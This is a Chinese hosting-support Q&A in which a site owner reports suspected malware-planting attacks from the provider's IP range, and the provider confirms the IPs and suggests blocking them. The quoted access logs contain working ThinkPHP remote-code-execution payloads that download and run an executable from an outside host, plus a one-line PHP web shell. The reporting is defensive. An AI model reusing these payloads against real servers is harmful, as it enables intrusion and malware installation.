问:三五互联的技术你好:
这些211.149开头的是你们的服务器吗,
涉嫌尝试对我的服务器进行攻击,挂马
访问日志部分记录如下:
127.0.0.1 – – [21/Dec/2018:00:37:26 0800] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/9.exe');start C:/9.exe HTTP/1.1" 404 548
涉嫌利用网站漏洞,嵌入PHP脚本,下载木马病毒文件,下载完之后并执行
127.0.0.1 – – [21/Dec/2018:06:22:58 0800] "GET /FxCodeShell.jsp?wiew=FxxkMyLieAa&os=1&address=http://a46.bulehero.in/download.exe HTTP/1.1" 200 651
同样,利用部分Java网站,一些具有漏洞的JSP脚本下载病毒文件
127.0.0.1 – – [21/Dec/2018:00:37:26 0800] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 548
127.0.0.1 – – [21/Dec/2018:00:37:26 0800] "GET /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/9.exe');start C:/9.exe HTTP/1.1" 404 548
不知道这些IP是否是你们的服务器,根据IP查询211.149开头的IP基本都是来自三五互联,我的网站从昨天晚上到现在拦截到一批疑似攻击的IP黑名单,不知道你们是否能够核查服务器内容,麻烦你们帮我看一下。
谢谢
,疑似来自你们服务器的挂马攻击
答:您好,感谢您的反馈,这些ip是我司的,我司非法信息部门会通知用户检查,如您网站不需要同211.149通信,可以屏蔽211.149段,非常感谢您长期对我司的支持!
